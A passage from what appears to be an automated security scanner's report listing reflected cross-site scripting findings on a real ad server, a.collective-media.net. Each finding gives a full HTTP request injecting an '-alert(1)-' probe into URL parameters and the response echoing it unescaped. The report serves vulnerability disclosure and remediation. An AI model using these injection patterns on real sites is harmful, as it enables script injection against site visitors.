P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:28 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:28 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home;sz=728x90;net=q1;ord=3639010052?&f507c'-alert(1)-'0cce3655674=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.12. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/home [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d6c0'-alert(1)-'5ac724d3334 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/home;sz=728x90;ord=3639010052?2d6c0'-alert(1)-'5ac724d3334 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 468
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:49:26 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E90af58da731901b84ed373b8; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:49:26 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home;sz=728x90;net=q1;ord=3639010052?2d6c0'-alert(1)-'5ac724d3334;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.13. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42243'-alert(1)-'0157ffe4a1a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer42243'-alert(1)-'0157ffe4a1a/qo;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer42243'-alert(1)-'0157ffe4a1a/qo;sz=300x250;net=q1;ord=[timestamp];'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.14. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4364f'-alert(1)-'1be745942f1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/qo4364f'-alert(1)-'1be745942f1;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 467
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:44 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo4364f'-alert(1)-'1be745942f1;sz=300x250;net=q1;ord=[timestamp];'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.15. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f44b9'-alert(1)-'d4036993b4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]?&f44b9'-alert(1)-'d4036993b4b=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 471
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:41 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:41 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp]?&f44b9'-alert(1)-'d4036993b4b=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.16. http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7365'-alert(1)-'5ffed8dc568 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]?c7365'-alert(1)-'5ffed8dc568 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 468
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:23:40 GMT
Connection: close
Set-Cookie: dc=sea-dc90af58da95785a528f279adf; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:23:40 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp]?c7365'-alert(1)-'5ffed8dc568;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.17. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aac19'-alert(1)-'6ed63ccc02d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjaac19'-alert(1)-'6ed63ccc02d/bzo.454.61DCBAA1/_default;sz=728x90;net=bzo;ord=1316294704606;ord1=364732;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7362
Date: Sat, 17 Sep 2011 16:25:34 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-30322335468_1316276734","http://ad.doubleclick.net/adjaac19'-alert(1)-'6ed63ccc02d/bzo.454.61DCBAA1/_default;net=bzo;u=,bzo-30322335468_1316276734,1229bf517f8af24,sports,;;cmw=owl;sz=728x90;net=bzo;ord1=364732;contx=sports;dc=s;btg=;ord=1316294704606?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.18. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d936d'-alert(1)-'4c985a1bafd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.454.61DCBAA1d936d'-alert(1)-'4c985a1bafd/_default;sz=728x90;net=bzo;ord=1316294704606;ord1=364732;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 16:25:35 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-30415204234_1316276735","http://ad.doubleclick.net/adj/bzo.454.61DCBAA1d936d'-alert(1)-'4c985a1bafd/_default;net=bzo;u=,bzo-30415204234_1316276735,1229bf517f8af24,sports,;;sz=728x90;net=bzo;ord1=364732;contx=sports;dc=s;btg=;ord=1316294704606?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.19. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b12e'-alert(1)-'945e5cb6e32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.454.61DCBAA1/_default9b12e'-alert(1)-'945e5cb6e32;sz=728x90;net=bzo;ord=1316294704606;ord1=364732;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7354
Date: Sat, 17 Sep 2011 16:25:35 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-30308893230_1316276735","http://ad.doubleclick.net/adj/bzo.454.61DCBAA1/_default9b12e'-alert(1)-'945e5cb6e32;net=bzo;u=,bzo-30308893230_1316276735,1229bf517f8af24,sports,;;sz=728x90;net=bzo;ord1=364732;contx=sports;dc=s;btg=;ord=1316294704606?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.20. http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/bzo.454.61DCBAA1/_default

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bc96'-alert(1)-'b8781adc851 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/bzo.454.61DCBAA1/_default;sz=1bc96'-alert(1)-'b8781adc851 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7329
Date: Sat, 17 Sep 2011 16:25:27 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
age="Javascript">CollectiveMedia.createAndAttachAd("bzo-30101590727_1316276727","http://ad.doubleclick.net/adj/bzo.454.61DCBAA1/_default;net=bzo;u=,bzo-30101590727_1316276727,1229bf517f8af24,none,;;sz=1bc96'-alert(1)-'b8781adc851;contx=none;dc=s;btg=?","1bc96'-alert(1)-'b8781adc851","",true);</scr'+'ipt>
...[SNIP]...

4.21. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c87f'-alert(1)-'f1f13cb8f9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj6c87f'-alert(1)-'f1f13cb8f9d/q1.q.seattlepostintelligencer/be_home;sz=300x250;net=q1;ord=3896159382;ord1=943060;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7367
Date: Sat, 17 Sep 2011 16:48:08 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30318841590_1316278088","http://ad.doubleclick.net/adj6c87f'-alert(1)-'f1f13cb8f9d/q1.q.seattlepostintelligencer/be_home;net=q1;u=,q1-30318841590_1316278088,121773f9380f32f,polit,;;cmw=owl;sz=300x250;net=q1;ord1=943060;contx=polit;dc=s;btg=;ord=3896159382?","300","250",true);</scr'+
...[SNIP]...

4.22. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d81ef'-alert(1)-'b5262d5dc96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencerd81ef'-alert(1)-'b5262d5dc96/be_home;sz=300x250;net=q1;ord=3896159382;ord1=943060;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7367
Date: Sat, 17 Sep 2011 16:48:09 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30309610626_1316278089","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencerd81ef'-alert(1)-'b5262d5dc96/be_home;net=q1;u=,q1-30309610626_1316278089,121773f9380f32f,polit,;;cmw=owl;sz=300x250;net=q1;ord1=943060;contx=polit;dc=s;btg=;ord=3896159382?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.23. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/be_home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8316e'-alert(1)-'256db4774f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/be_home8316e'-alert(1)-'256db4774f0;sz=300x250;net=q1;ord=3896159382;ord1=943060;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7367
Date: Sat, 17 Sep 2011 16:48:10 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30517347600_1316278090","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/be_home8316e'-alert(1)-'256db4774f0;net=q1;u=,q1-30517347600_1316278090,121773f9380f32f,polit,;;cmw=owl;sz=300x250;net=q1;ord1=943060;contx=polit;dc=s;btg=;ord=3896159382?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.24. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/be_home [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/be_home

